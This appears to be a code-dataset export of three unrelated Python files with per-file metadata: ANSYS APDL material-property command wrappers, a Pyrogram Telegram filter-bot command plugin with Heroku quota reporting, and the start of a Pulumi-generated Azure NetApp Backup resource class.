ALPX - Secant coefficients of thermal expansion (also ALPY, ALPZ). (See also MPAMOD
command for adjustment to reference temperature).
BETD - Stiffness matrix multiplier for damping.
BETX - Coefficient of diffusion expansion (also BETY, BETZ)
C - Specific heat.
CREF - Reference concentration (may not be temperature dependent)
CSAT - Saturated concentration
CTEX - Instantaneous coefficients of thermal expansion (also CTEY, CTEZ).
DENS - Mass density.
DMPR - Constant material damping coefficient.
DXX - Diffusivity coefficients (also DYY, DZZ)
EMIS - Emissivity.
ENTH - Enthalpy.
EX - Elastic moduli (also EY, EZ).
GXY - Shear moduli (also GYZ, GXZ).
HF - Convection or film coefficient.
KXX - Thermal conductivities (also KYY, KZZ).
LSST - Dielectric loss tangent.
MGXX - Magnetic coercive forces (also MGYY, MGZZ).
MU - Coefficient of friction.
MURX - Magnetic relative permeabilities (also MURY, MURZ).
NUXY - Minor Poisson's ratios (also NUYZ, NUXZ).
PERX - Electric relative permittivities (also PERY, PERZ).
PRXY - Major Poisson's ratios (also PRYZ, PRXZ).
QRATE - Heat generation rate.
REFT - Reference temperature (may not be temperature dependent).
RH - Hall Coefficient.
RSVX - Electrical resistivities (also RSVY, RSVZ).
SBKX - Seebeck coefficients (also SBKY, SBKZ).
SONC - Sonic velocity.
THSX - Thermal strain (also THSY, THSZ).
VISC - Viscosity.
mat
Material reference number to be associated with the elements
(defaults to 1 if you specify zero or no material number).
sloc
Starting location in table for generating data. For example, if
SLOC = 1, data input in the C1 field is the first constant in the
table. If SLOC = 7, data input in the C1 field is the seventh
constant in the table, etc. Defaults to the last location filled +
1.
c1, c2, c3, . . . , c6
Property data values assigned to six locations starting with SLOC.
If a value is already in this location, it is redefined. A blank
(or zero) value for C1 resets the previous value in SLOC to zero.
A value of zero can only be assigned by C1. Blank (or zero) values
for C2 to C6 leave the corresponding previous values unchanged.
Notes
-----
Defines a table of property data to be associated with the temperature
table. Repeat MPDATA command for additional values (100 maximum).
Temperatures must be defined first [MPTEMP]. Also stores assembled
property function table (temperature and data) in virtual space.
This command is also valid in SOLUTION.
Without Emag enabled, the ``MURx`` and ``MGxx`` properties are
not allowed. In ANSYS Professional, all structural and
thermal properties are allowed except ALPD, BETD, and MU. In
ANSYS Emag, only the ``RSVx``, ``PERx``, ``MURx``, and ``MGxx``
properties are allowed. Only products that include ANSYS Emag
can use the LSST property. The ``SBKx`` property is only available
in ANSYS Multiphysics and ANSYS PrepPost.
"""
command = "MPDATA,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(sloc),
str(c1),
str(c2),
str(c3),
str(c4),
str(c5),
str(c6),
)
return self.run(command, **kwargs)
def mpdele(self, lab="", mat1="", mat2="", inc="", lchk="", **kwargs):
"""APDL Command: MPDELE
Deletes linear material properties.
Parameters
----------
lab
Material property label (see MP command for valid labels). If ALL,
delete properties for all applicable labels.
mat1, mat2, inc
Delete materials from MAT1 to MAT2 (defaults to MAT1) in steps of
INC (defaults to 1). If MAT1 = ALL, MAT2 and INC are ignored and
the properties for all materials are deleted.
lchk
Specifies the level of element-associativity checking:
NOCHECK - No element-associativity check occurs. This option is the default.
WARN - When a section, material, or real constant is associated with an element, ANSYS
issues a message warning that the necessary entity has been
deleted.
CHECK - The command terminates, and no section, material, or real constant is deleted
if it is associated with an element.
Notes
-----
This command is also valid in SOLUTION.
The LCHK argument is valid only when Lab = ALL.
"""
command = "MPDELE,%s,%s,%s,%s,%s" % (
str(lab),
str(mat1),
str(mat2),
str(inc),
str(lchk),
)
return self.run(command, **kwargs)
def mpdres(self, labf="", matf="", labt="", matt="", **kwargs):
"""APDL Command: MPDRES
Reassembles existing material data with the temperature table.
Parameters
----------
labf
Material property label associated with MATF.
matf
Material reference number of property to restore from virtual
space.
labt
Material property label associated with MATT (defaults to label
associated with MATF).
matt
Material reference number assigned to generated property (defaults
to MATF).
Notes
-----
Restores into the database (from virtual space) a data table previously
defined [MP] for a particular property, assembles data with current
database temperature table, and stores back in virtual space as a new
property.
This command is also valid in SOLUTION.
"""
command = "MPDRES,%s,%s,%s,%s" % (str(labf), str(matf), str(labt), str(matt))
return self.run(command, **kwargs)
def mplib(self, r_w_opt="", path="", **kwargs):
"""APDL Command: /MPLIB
Sets the default material library read and write paths.
Parameters
----------
        r_w_opt
Determines what path is being set. Possible values are:
READ - Set the read path.
WRITE - Set the write path.
STAT - Report what read and write paths are currently in use.
path
The directory path to be used for material library files.
Notes
-----
The /MPLIB command sets two path strings used in conjunction with the
material library feature and the MPREAD and MPWRITE commands.
For MPREAD, when you use the LIB option and no directory path is given
in the file name, the command searches for the file in these locations:
the current working directory, the user's home directory, the user-
specified material library directory (as defined by the
/MPLIB,READ,PATH command), and /ansys_dir/matlib.
For MPWRITE, when you use the LIB option and the directory portion of
the specification for the material library file is blank, the command
writes the material library file to the directory specified by the
/MPLIB,WRITE,PATH command (if that path has been set). If the path has
not been set, the default is to write the file to the current working
directory.
The Material Library files supplied with the distribution disks are
meant for demonstration purposes only. These files are not intended
for use in customer applications.
"""
command = "/MPLIB,%s,%s" % (str(r_w_opt), str(path))
return self.run(command, **kwargs)
def mplist(self, mat1="", mat2="", inc="", lab="", tevl="", **kwargs):
"""APDL Command: MPLIST
Lists linear material properties.
Parameters
----------
mat1, mat2, inc
List materials from MAT1 to MAT2 (defaults to MAT1) in steps of INC
(defaults to 1). If MAT1= ALL (default), MAT2 and INC are ignored
and properties for all material numbers are listed.
lab
Material property label (see the MP command for labels). If ALL
(or blank), list properties for all labels. If EVLT, list
properties for all labels evaluated at TEVL.
tevl
Evaluation temperature for Lab = EVLT listing (defaults to BFUNIF).
Notes
-----
For Lab = EVLT, when the property is from tables, the MPPLOT command
will not be valid because the property could be a function of more than
temperature.
This command is valid in any processor.
"""
command = "MPLIST,%s,%s,%s,%s,%s" % (
str(mat1),
str(mat2),
str(inc),
str(lab),
str(tevl),
)
return self.run(command, **kwargs)
def mpplot(self, lab="", mat="", tmin="", tmax="", pmin="", pmax="", **kwargs):
"""APDL Command: MPPLOT
Plots linear material properties as a function of temperature.
Parameters
----------
lab
Linear material property label (EX, EY, etc.) [MP].
mat
Material reference number. Defaults to 1.
tmin
Minimum abscissa value to be displayed.
tmax
Maximum abscissa value.
pmin
Minimum property (ordinate) value to be displayed.
pmax
Maximum property value.
Notes
-----
When the property is from tables, the MPPLOT command will not be valid
because the property could be a function of more than temperature.
This command is valid in any processor.
"""
command = "MPPLOT,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(tmin),
str(tmax),
str(pmin),
str(pmax),
)
return self.run(command, **kwargs)
def mpread(self, fname="", ext="", lib="", **kwargs):
"""APDL Command: MPREAD
Reads a file containing material properties.
Parameters
----------
fname
File name and directory path (248 characters maximum,
including directory). If you do not specify the ``LIB``
option, the default directory is the current working
directory. If you specify the ``LIB`` option, the default is
the following search path: the current working directory,
the user's home directory, ``MPLIB_DIR`` (as specified by the
``/MPLIB,READ,PATH`` command) and ``/ansys_dir/matlib`` (as
defined by installation). If you use the default for your
directory, you can use all 248 characters for the file
name.
ext
Filename extension (eight-character maximum).
lib
Reads material library files previously written with the
MPWRITE command. (See the description of the ``LIB`` option
for the ``MPWRITE`` command.) The only allowed value for ``LIB``
is ``LIB``.
Notes
-----
Material properties written to a file without the ``LIB`` option
do not support nonlinear properties. Also, properties written
to a file without the ``LIB`` option are restored in the same
material number as originally defined. To avoid errors, use
``MPREAD`` with the ``LIB`` option only when reading files written
using MPWRITE with the ``LIB`` option.
If you omit the ``LIB`` option for ``MPREAD``, this command supports
only linear properties.
        Material numbers are hardcoded. If you write a material file
        without specifying the ``LIB`` option and then read that file in
        using the ``MPREAD`` command with the ``LIB`` option, the ANSYS
        program will not assign the properties to a new material number.
        Instead, it restores them under the "old" material number (the
        number specified on the MPWRITE command that created the file).
This command is also valid in SOLUTION.
"""
return self.run(f"MPREAD,{fname},{ext},,{lib}", **kwargs)
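    # Usage sketch (illustration only): assuming a connected session ``mapdl``
    # and a material library file ``steel.SI_MPL`` previously written with
    # MPWRITE,...,LIB (both names hypothetical):
    #
    #     mapdl.prep7()
    #     mapdl.mat(2)                               # material number to restore into
    #     mapdl.mpread("steel", "SI_MPL", lib="LIB")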
def mptemp(self, sloc="", t1="", t2="", t3="", t4="", t5="", t6="", **kwargs):
"""APDL Command: MPTEMP
Defines a temperature table for material properties.
Parameters
----------
sloc
Starting location in table for entering temperatures. For example,
if SLOC = 1, data input in the T1 field applies to the first
constant in the table. If SLOC = 7, data input in the T1 field
applies to the seventh constant in the table, etc. Defaults to the
last location filled + 1.
t1, t2, t3, . . . , t6
Temperatures assigned to six locations starting with SLOC. If a
value is already in this location, it will be redefined. A blank
(or zero) value for T1 resets the previous value in SLOC to zero.
A value of zero can only be assigned by T1. Blank (or zero) values
for T2 to T6 leave the corresponding previous values unchanged.
Notes
-----
Defines a temperature table to be associated with the property data
table [MPDATA]. These temperatures are also used for polynomial
property evaluation, if defined [MP]. Temperatures must be defined in
non-descending order. Issue MATER $ STAT to list the current
temperature table. Repeat MPTEMP command for additional temperatures
(100 maximum). If all arguments are blank, the temperature table is
erased.
For clear definition, the temperature range you define with the MPTEMP
command should include the entire range you'll use in subsequently
defined materials. To assist the user in this, the first (and only the
first) excursion out of the temperature range defined by the MPTEMP
commands is flagged with a warning message. Similarly, the reference
temperature (TREF or MP,reft commands) should also fall in this same
temperature range. If not and MP,alpx was used, a note will be output.
If not, and MP,ctex or MP,thsx was used, an error message will be
output.
This command is also valid in SOLUTION.
"""
command = "MPTEMP,%s,%s,%s,%s,%s,%s,%s" % (
str(sloc),
str(t1),
str(t2),
str(t3),
str(t4),
str(t5),
str(t6),
)
return self.run(command, **kwargs)
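    # Usage sketch (illustration only): assuming a connected session ``mapdl``,
    # a four-point temperature table followed by matching property data (MPDATA
    # locations correspond to the MPTEMP locations):
    #
    #     mapdl.mptemp()                      # blank arguments erase any old table
    #     mapdl.mptemp(1, 0, 50, 100, 150)    # temperatures at locations 1-4
    #     mapdl.mpdata("EX", 1, 1, 2.1e11, 2.0e11, 1.9e11, 1.8e11)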
def mptgen(self, stloc="", num="", tstrt="", tinc="", **kwargs):
"""APDL Command: MPTGEN
Adds temperatures to the temperature table by generation.
Parameters
----------
stloc
Starting location in table for generating temperatures. Defaults
to last location filled + 1.
num
Number of temperatures to be generated (1-100).
tstrt
Temperature assigned to STLOC location.
tinc
Increment previous temperature by TINC and assign to next location
until all NUM locations are filled.
Notes
-----
        Adds temperatures to the temperature table by generation. May be used
        in combination with (or in place of) the MPTEMP command.
This command is also valid in SOLUTION.
"""
command = "MPTGEN,%s,%s,%s,%s" % (str(stloc), str(num), str(tstrt), str(tinc))
return self.run(command, **kwargs)
def mptres(self, lab="", mat="", **kwargs):
"""APDL Command: MPTRES
Restores a temperature table previously defined.
Parameters
----------
lab
Material property label [MP].
mat
Material reference number.
Notes
-----
Restores into the database (from virtual space) a temperature table
previously defined [MP] for a particular property. The existing
temperature table in the database is erased before this operation.
This command is also valid in SOLUTION.
"""
command = "MPTRES,%s,%s" % (str(lab), str(mat))
return self.run(command, **kwargs)
def mpwrite(self, fname="", ext="", lib="", mat="", **kwargs):
"""APDL Command: MPWRITE
Writes linear material properties in the database to a file
(if the LIB option is not specified) or writes both linear and
nonlinear material properties (if LIB is specified) from the
database to a file.
Parameters
----------
fname
File name and directory path (248 characters maximum, including
directory). If you do not specify the ``LIB`` option, the default
directory is the current working directory. If you specify ``LIB`` and
you have specified a material library directory (via the ``/MPLIB``
command), that directory is the default. Otherwise, the default is
the current working directory. If you use the default for your
directory, you can use all 248 characters for the file name.
The file name defaults to Jobname.
ext
Filename extension (eight-character maximum).
If you omit the ``LIB`` option, the default extension is
MP. If you specify the ``LIB`` option, the default extension
is units_MPL, where units is the system of units currently
in use. (See the description of the ``/UNITS`` command.) For
example, if ``/UNITS`` is set to BIN, the extension defaults
to BIN_MPL.
lib
The only value allowed for this field is the string ``"LIB"``.
The ``LIB`` option indicates that you wish to have properties
associated with the material (``MAT``) written to the
specified material library file using the material library
file format. The material library file format is
ASCII-text-based ANSYS command input. Certain commands
associated with this format have been modified to
interpret the string "_MATL" to mean the currently
selected material. This feature makes the material library
file independent of the material number in effect when the
file was written; this enables you to restore the
properties into the ANSYS database using the material
number of your choice. The ``LIB`` option also enables you to
save both linear and nonlinear properties. If you omit the
``LIB`` option, you can save linear properties only.
mat
Specifies the material to be written to the named material library
file. There is no default; you must either specify a material or
omit the ``MAT`` argument. Even if you specify a ``MAT`` value, the ANSYS
program ignores it if the ``LIB`` argument is not specified.
Notes
-----
Writes linear material properties currently in the database to a file.
The file is rewound before and after writing.
This command is also valid in SOLUTION.
"""
return self.run(f"MPWRITE,{fname},{ext},,{lib},{mat}", **kwargs)
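    # Usage sketch (illustration only): assuming a connected session ``mapdl``
    # and a material library directory set up with /MPLIB as described above
    # (directory and file names hypothetical):
    #
    #     mapdl.mplib("WRITE", "/home/user/matlib")
    #     mapdl.mpwrite("steel", lib="LIB", mat=1)   # linear + nonlinear props of MAT 1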
def tbft(
self,
oper="",
id_="",
option1="",
option2="",
option3="",
option4="",
option5="",
option6="",
option7="",
**kwargs,
):
"""APDL Command: TBFT
Performs material curve-fitting operations.
Parameters
----------
oper
The specific curve-fitting operation:
            - Define a constitutive model.
            - Delete a constitutive model.
            - Write data related to a constitutive model to the database
              (same as TB command).
            - Initialize coefficients of a constitutive model for nonlinear
              curve-fitting procedure.
            - Deletes coefficients at current reference temperature.
              Applicable only for temperature dependent coefficients.
            - Solve for coefficients.
            - Fix (hold constant) the coefficient you specify in Option4.
            - Add experimental data.
            - Delete experimental data.
            - List all data associated with the material model represented
              by the material ID number.
id_
The material reference number (same as MAT argument used in the TB
command). Valid entry is any number greater than zero (default = 1)
but less than 100,000.
option1
For curve-fit function operations (Oper = FADD, FDEL, FSET, SET,
CDEL, SOLVE or FIX) this field specifies the category (HYPER).
option2
For curve-fit function operations (Oper = FADD, FDEL, FSET, SET,
CDEL, SOLVE, or FIX), this field specifies constitutive model type.
The valid entries are listed in Table 231: Hyperelastic Options
below.
option3
For Oper = FADD, FDEL, FSET, CDEL, SET, SOLVE or FIX, some of the
cases specified in Option2 will require that the polynomial order
be specified. The applicable values for the order specification are
listed in Table 231: Hyperelastic Options.
option4
When you are working on a specific coefficient (Oper = FIX), this
field specifies the index of that coefficient. Valid entries vary
from 1 to n, where n is the total number of coefficients (default =
1).
option5
When you are working on a specific coefficient (Oper = FIX), this
field specifies the index of that coefficient. Valid entries vary
from 1 to N, where N is the total number of coefficients (default =
1)
option6
If Oper = SOLVE, specifies the allowed tolerance in residual change
to stop an iteration. Valid entry is 0.0 to 1.0 (default = 0.0).
option7
If Oper = SOLVE, specifies the allowed tolerance in coefficient
change to stop an iteration. Valid entry is 0 to 1 (default = 0).
"""
command = "TBFT,%s,%s,%s,%s,%s,%s,%s,%s,%s" % (
str(oper),
str(id_),
str(option1),
str(option2),
str(option3),
str(option4),
str(option5),
str(option6),
str(option7),
)
return self.run(command, **kwargs)
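    # Usage sketch (illustration only): a hyperelastic curve fit for material 1,
    # assuming a connected session ``mapdl`` and an experimental data file
    # ``uniaxial.exp`` (file name hypothetical); option strings follow the TBFT
    # documentation rather than anything defined in this wrapper:
    #
    #     mapdl.tbft("FADD", 1, "HYPER", "MOONEY", "3")    # define a 3-term Mooney-Rivlin model
    #     mapdl.tbft("EADD", 1, "UNIA", "uniaxial.exp")    # attach uniaxial test data
    #     mapdl.tbft("SOLVE", 1, "HYPER", "MOONEY", "3")   # fit the coefficients
    #     mapdl.tbft("FSET", 1, "HYPER", "MOONEY", "3")    # write the fitted model to the database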
def uimp(
self, mat="", lab1="", lab2="", lab3="", val1="", val2="", val3="", **kwargs
):
"""APDL Command: UIMP
Defines constant material properties (GUI).
Parameters
----------
mat
Material number.
lab1, lab2, lab3
Material property labels (see the MP command for valid labels).
val1, val2, val3
Values corresponding to three labels.
Notes
-----
Defines constant material properties. This is a command generated by
the Graphical User Interface (GUI) and will appear in the log file
(Jobname.LOG) if material properties are specified using the Material
Properties dialog box. This command is not intended to be typed in
directly in an ANSYS session (although it can be included in an input
file for batch input or for use with the /INPUT command).
"""
command = "UIMP,%s,%s,%s,%s,%s,%s,%s" % (
str(mat),
str(lab1),
str(lab2),
str(lab3),
str(val1),
str(val2),
str(val3),
)
return self.run(command, **kwargs)
| 36.974879
| 170
| 0.58925
|
aab264de277b03e005e296a209ec21133932f73d
| 9,248
|
py
|
Python
|
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
import os
import math
import json
import time
import shutil
import heroku3
import requests
from pyrogram import filters
from pyrogram import Client as trojanz
from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton
if bool(os.environ.get("WEBHOOK", False)):
from sample_config import Config
else:
from config import Config
from script import Script
from plugins.helpers import humanbytes
from database.filters_mdb import filter_stats
from database.users_mdb import add_user, find_user, all_users
@trojanz.on_message(filters.command('id') & (filters.private | filters.group))
async def showid(client, message):
chat_type = message.chat.type
if chat_type == "private":
user_id = message.chat.id
await message.reply_text(
f"Your ID : `{user_id}`",
parse_mode="md",
quote=True
)
elif (chat_type == "group") or (chat_type == "supergroup"):
user_id = message.from_user.id
chat_id = message.chat.id
if message.reply_to_message:
reply_id = f"Replied User ID : `{message.reply_to_message.from_user.id}`"
else:
reply_id = ""
await message.reply_text(
f"Your ID : `{user_id}`\nThis Group ID : `{chat_id}`\n\n{reply_id}",
parse_mode="md",
quote=True
)
@trojanz.on_message(filters.command('info') & (filters.private | filters.group))
async def showinfo(client, message):
try:
cmd, id = message.text.split(" ", 1)
except:
id = False
pass
if id:
if (len(id) == 10 or len(id) == 9):
try:
checkid = int(id)
except:
await message.reply_text("__Enter a valid USER ID__", quote=True, parse_mode="md")
return
else:
await message.reply_text("__Enter a valid USER ID__", quote=True, parse_mode="md")
return
if Config.SAVE_USER == "yes":
name, username, dcid = await find_user(str(id))
else:
try:
user = await client.get_users(int(id))
name = str(user.first_name + (user.last_name or ""))
username = user.username
dcid = user.dc_id
except:
name = False
pass
if not name:
await message.reply_text("__USER Details not found!!__", quote=True, parse_mode="md")
return
else:
if message.reply_to_message:
name = str(message.reply_to_message.from_user.first_name\
+ (message.reply_to_message.from_user.last_name or ""))
id = message.reply_to_message.from_user.id
username = message.reply_to_message.from_user.username
dcid = message.reply_to_message.from_user.dc_id
else:
name = str(message.from_user.first_name\
+ (message.from_user.last_name or ""))
id = message.from_user.id
username = message.from_user.username
dcid = message.from_user.dc_id
if not str(username) == "None":
user_name = f"@{username}"
else:
user_name = "none"
await message.reply_text(
f"<b>👨💼Name</b> : {name}\n\n"
f"<b>📃User ID</b> : <code>{id}</code>\n\n"
f"<b>👤Username</b> : {user_name}\n\n"
f"<b>🔐Permanant USER link</b> : <a href='tg://user?id={id}'>Click here!</a>\n\n"
f"<b>📑DC ID</b> : {dcid}\n\n",
quote=True,
parse_mode="html"
)
@trojanz.on_message((filters.private | filters.group) & filters.command('status'))
async def bot_status(client,message):
if str(message.from_user.id) not in Config.AUTH_USERS:
return
chats, filters = await filter_stats()
if Config.SAVE_USER == "yes":
users = await all_users()
userstats = f"> __**{users} users have interacted with your bot!**__\n\n"
else:
userstats = ""
if Config.HEROKU_API_KEY:
try:
server = heroku3.from_key(Config.HEROKU_API_KEY)
user_agent = (
'Mozilla/5.0 (Linux; Android 10; SM-G975F) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/80.0.3987.149 Mobile Safari/537.36'
)
accountid = server.account().id
headers = {
'User-Agent': user_agent,
'Authorization': f'Bearer {Config.HEROKU_API_KEY}',
'Accept': 'application/vnd.heroku+json; version=3.account-quotas',
}
path = "/accounts/" + accountid + "/actions/get-quota"
request = requests.get("https://api.heroku.com" + path, headers=headers)
if request.status_code == 200:
result = request.json()
total_quota = result['account_quota']
quota_used = result['quota_used']
quota_left = total_quota - quota_used
total = math.floor(total_quota/3600)
used = math.floor(quota_used/3600)
hours = math.floor(quota_left/3600)
minutes = math.floor(quota_left/60 % 60)
days = math.floor(hours/24)
usedperc = math.floor(quota_used / total_quota * 100)
leftperc = math.floor(quota_left / total_quota * 100)
quota_details = f"""
**Heroku Account Status**
> __You have **{total} hours** of free dyno quota available each month.__
> __Dyno hours used this month__ ;
- **{used} hours** ( {usedperc}% )
> __Dyno hours remaining this month__ ;
- **{hours} hours** ( {leftperc}% )
- **Approximately {days} days!**
"""
else:
quota_details = ""
except:
print("Check your Heroku API key")
quota_details = ""
else:
quota_details = ""
uptime = time.strftime("%Hh %Mm %Ss", time.gmtime(time.time() - Config.BOT_START_TIME))
try:
t, u, f = shutil.disk_usage(".")
total = humanbytes(t)
used = humanbytes(u)
free = humanbytes(f)
disk = "\n**Disk Details**\n\n" \
f"> USED : {used} / {total}\n" \
f"> FREE : {free}\n\n"
except:
disk = ""
await message.reply_text(
"**Current status of your bot!**\n\n"
f"> __**{filters}** filters across **{chats}** chats__\n\n"
f"{userstats}"
f"> __BOT Uptime__ : **{uptime}**\n\n"
f"{quota_details}"
f"{disk}",
quote=True,
parse_mode="md"
)
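# Worked example (illustration only): Heroku reports the dyno quota in seconds.
# With a hypothetical monthly quota of 550 hours (1,980,000 s) of which
# 396,000 s have been used, the arithmetic above gives:
#   used = 396000 // 3600   -> 110 hours (20% of the quota)
#   left = 1584000 // 3600  -> 440 hours (80%), i.e. roughly 18 days of one dyno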
@trojanz.on_message(filters.command('start') & filters.private)
async def start(client, message):
await message.reply_text(
text=Script.START_MSG.format(message.from_user.mention),
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("Thanks for using me", callback_data="help_data")
],
[
InlineKeyboardButton("Group", url="https://t.me/Tamil_RockersGroup"),
InlineKeyboardButton("Channel", url="https://t.me/Movie_market_new_releases")
],
[
InlineKeyboardButton("🔻Official Group🔻", url="https://t.me/all_super_movies")
]
]
),
reply_to_message_id=message.message_id
)
if Config.SAVE_USER == "yes":
try:
await add_user(
str(message.from_user.id),
str(message.from_user.username),
str(message.from_user.first_name + " " + (message.from_user.last_name or "")),
str(message.from_user.dc_id)
)
except:
pass
@trojanz.on_message(filters.command('help') & filters.private)
async def help(client, message):
await message.reply_text(
text=Script.HELP_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("🗣️𝙶𝚛𝚘𝚞𝚙", url="https://t.me/Tamil_RockersGroup"),
InlineKeyboardButton("About Me👨💼", callback_data="about_data")
],
[
InlineKeyboardButton("🖥️ want a bot? 🖥️", url="https://t.me/geronimo1234")
]
]
),
reply_to_message_id=message.message_id
)
@trojanz.on_message(filters.command('about') & filters.private)
async def about(client, message):
await message.reply_text(
text=Script.ABOUT_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
"⛓️ 𝚂𝙾𝚄𝚁𝙲𝙴 𝙲𝙾𝙳𝙴 ⛓️", url="https://github.com/hnhnhnhnhnlkhfbdff")
],
[
InlineKeyboardButton("🔙 𝙱𝚊𝚌𝚔", callback_data="help_data"),
InlineKeyboardButton("𝙲𝚕𝚘𝚜𝚎 🔐", callback_data="close_data"),
]
]
),
reply_to_message_id=message.message_id
)
| 32.56338
| 98
| 0.552119
|
8430bd7bb8fe855a2d8ca2fd4121f6855a91721f
| 506
|
py
|
Python
|
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class MaxpointsValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="maxpoints", parent_name="indicator.stream", **kwargs
):
super(MaxpointsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
max=kwargs.pop("max", 10000),
min=kwargs.pop("min", 0),
**kwargs,
)
| 31.625
| 79
| 0.626482
|
38c30a0b84e87433035166cb8f59a7895bed58df
| 424
|
py
|
Python
|
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | 1
|
2021-03-25T09:58:50.000Z
|
2021-03-25T09:58:50.000Z
|
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | null | null | null |
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | 1
|
2021-02-01T16:54:33.000Z
|
2021-02-01T16:54:33.000Z
|
from os import walk
import numpy as np
numpdatdir = './uploads/'
cleandatadir = './cleaned_data/faults_current_only/'
allFiles = [f for _, _1, f in walk(cleandatadir) ]
allFiles = allFiles[0]
tdata = []
for fn in allFiles:
tmp = np.loadtxt(cleandatadir+fn)
y = float( fn[2:-5] )
tdata += [[tmp, y]]
tdata = np.array(tdata,dtype=object)
savedataname = 'numpydata'
np.save(numpdatdir+savedataname, tdata)
| 21.2
| 52
| 0.681604
|
6a0b24103fbbf6cab873e0e5ceb7ad250a2bd9d6
| 12,988
|
py
|
Python
|
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = ['BackupArgs', 'Backup']
@pulumi.input_type
class BackupArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
pool_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
volume_name: pulumi.Input[str],
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Backup resource.
:param pulumi.Input[str] account_name: The name of the NetApp account
:param pulumi.Input[str] pool_name: The name of the capacity pool
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] volume_name: The name of the volume
:param pulumi.Input[str] backup_name: The name of the backup
:param pulumi.Input[str] label: Label for backup
:param pulumi.Input[str] location: Resource location
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "pool_name", pool_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "volume_name", volume_name)
if backup_name is not None:
pulumi.set(__self__, "backup_name", backup_name)
if label is not None:
pulumi.set(__self__, "label", label)
if location is not None:
pulumi.set(__self__, "location", location)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the NetApp account
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="poolName")
def pool_name(self) -> pulumi.Input[str]:
"""
The name of the capacity pool
"""
return pulumi.get(self, "pool_name")
@pool_name.setter
def pool_name(self, value: pulumi.Input[str]):
pulumi.set(self, "pool_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> pulumi.Input[str]:
"""
The name of the volume
"""
return pulumi.get(self, "volume_name")
@volume_name.setter
def volume_name(self, value: pulumi.Input[str]):
pulumi.set(self, "volume_name", value)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the backup
"""
return pulumi.get(self, "backup_name")
@backup_name.setter
def backup_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_name", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
Label for backup
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
class Backup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
